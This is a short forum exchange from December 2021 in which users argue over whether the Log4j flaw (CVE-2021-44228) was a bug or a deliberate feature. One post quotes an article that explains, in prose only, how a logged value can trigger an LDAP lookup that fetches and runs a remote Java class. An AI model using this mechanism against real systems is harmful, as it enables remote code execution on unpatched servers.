Free Republic
Browse · Search 		News/Activism
Topics · Post Article

To: vikingd00d

It’s not normally there.

This is a vulnerability that makes that happen to the OS.


4 posted on 12/12/2021 9:26:16 PM PST by ConservativeMind (Trump: Befuddling Democrats, Republicans, and the Media for the benefit of the US and all mankind.)
[ Post Reply | Private Reply | To 3 | View Replies ]

To: ConservativeMind

>>It’s not normally there.

Wrong. That “feature” was deliberately coded.

From a different article on it:

The bug, now officially denoted CVE-2021-44228, involves sending a request to a vulnerable server in which you include some data – for example, an HTTP header – that you expect (or know) the server will write to its logfile.

But you booby-trap that data so that the server, while wrangling the data into a format suitable for logging, kicks off a web download as an integral part of constructing the needed log entry.

And not just any old download: if the data that comes back is a valid Java program (a .class file, in the jargon), then the server runs that file to “help” it generate the logging data.

The trick is that, by default, unpatched versions of the Log4j library permit logging requests to trigger general-purpose LDAP (directory services) searches, as well as various other online lookups.


7 posted on 12/12/2021 9:34:28 PM PST by vikingd00d (chown -R us ~you/base)
[ Post Reply | Private Reply | To 4 | View Replies ]

Free Republic
Browse · Search 		News/Activism
Topics · Post Article

FreeRepublic, LLC, PO BOX 9771, FRESNO, CA 93794
FreeRepublic.com is powered by software copyright 2000-2008 John Robinson